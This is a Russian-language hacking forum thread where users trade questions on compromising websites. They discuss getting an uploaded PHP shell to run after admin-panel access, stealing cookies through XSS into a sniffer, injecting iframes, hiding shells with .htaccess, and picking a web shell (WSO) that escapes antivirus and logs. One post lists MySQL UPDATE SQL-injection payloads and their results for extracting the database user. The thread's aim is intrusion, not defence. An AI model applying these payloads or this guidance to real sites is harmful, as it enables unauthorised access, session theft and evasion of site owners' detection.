Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    239
    Likes Received:
    87
    Reputations:
    1
    В общем возникла ситуация, получил доступ в админку в управление файлами смог спокойно загрузить свой php shell, но возникает проблема, при обращение по прямой ссылке предлагает скачать файл, попытался загрузить .htacces в ответ получил, такое сообщение: "Произошла ошибка!
    - Название файла не соответствует шаблону <name.ext>."
    Есть идеи?
     
  2. Seo_pharmacy

    Seo_pharmacy New Member

    Joined:
    14 Aug 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Сорри , за глупый вопрос.
    При помощи активной xss , возможно перенаправление трафика ?
    Всмысле если обнаружил активную ксс , могу ли я сливать траф с этого сайта ?
     
  3. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    Если кто знает, подскажите бесплатный IRC сервер.
     
  4. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    Если есть пассивная ксс, и я отправил кому-то адрес со скриптом который ворует печеньки, то куда они сохранятся(печеньки)? В изображение?
     
  5. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    надо на снифер гнать куки, в картинку они не как не сохранятся
     
  6. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    и как это сделать?
     
  7. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    Сколько статей по xss не читал, нигде не встречал никакого сниффера.
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    ты их вобще читал?
    https://forum.antichat.ru/showthread.php?t=20140
    ето для кого написано?

     
  9. Seo_pharmacy

    Seo_pharmacy New Member

    Joined:
    14 Aug 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    http://forum.antichat.ru/thread104591.html в самом низу смотри...


    Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?
     
  10. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    46
    Likes Received:
    7
    Reputations:
    0
    может кто подробнее разложить, как спрятать шелл с помощью .htaccess ?
     
  11. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    а сам тег <iframe> фильтруется? можно попробовать добавить на страницу через innerHTML
     
  12. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    Подскажите какой shell лучше заливать,чтоб его не палил антивирус и разные скрипты?
     
  13. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    самописный :D
     
  14. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    А из таких что есть в паблике?Потому что писать только по русски могу. :rolleyes:
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а в чём проблема? вставляещь код фрейма и всё

    никак

    юзай всо и не парся поетому вопросу вобще
     
  16. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    qaz ним и пользуюсь но где то читал что он много следов в логах оставляет,и антивирусами палиться.
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.
     
    _________________________
    1 person likes this.
  18. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Всем привет!

    В UPDATE(MySQL) есть sqlinj. Как наиболее эффективно ей воспользоваться.

    Есть кое какие ограничения:
    -вывода ошибки нет, только алерт, что ошипке
    -в поле зависать можно только число(если сделать подстановку)

    Что пробовал:
    Code:
    '+(select(user()))+'
    результат - пусто
    Code:
    a'+(select(user()))+'b
    результат - пусто
    Code:
    1'+(select(3))+'2
    результат 6
    Code:
    1'+(select('c'))+'2
    результат 3
    Code:
    a'+(select('3'))+'b
    результат 3
    Code:
    1'+(select(version()))+'2
    результат - 8.1

    Конечно можно blind'ануть, но придумал такой вариант:
    Code:
    '+(select(Replace(Replace(Replace(Replace(Replace(Replace(hex(user()),'F','006'),'E','005'),'D','004'),'C','003'),'B','002'),'A','001')))+'
    Если текст небольшой,
    результат - 00419100400021004182
    иначе - 4.19100400021004e+17
    По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации 4.19100400021004e+17 дает 00419100400021004000

    Еще была мысль закомментить оставшуюся часть запроса и update'нуть другое поле, но опасаюсь засветиться, т.к. хз что в where. Хотя по косвенным признакам можно id вытянуть, но боюсь он не цифровой.

    Есть еще предложения, что можно сделать?
     
  19. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    102
    Likes Received:
    0
    Reputations:
    -10
    Подскажи пожалуйста где скачать последнюю версию?Не могу найти.
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    пожалуйста, сир. долго искали что не нашли? гугл сдох?

    запрос "site:forum.antichat.ru wso" больше не работает?

    http://forum.antichat.ru/thread103155.html
     
    _________________________
    #21380 Konqi, 12 Nov 2012
    Last edited: 12 Nov 2012
Loading...
Thread Status:
Not open for further replies.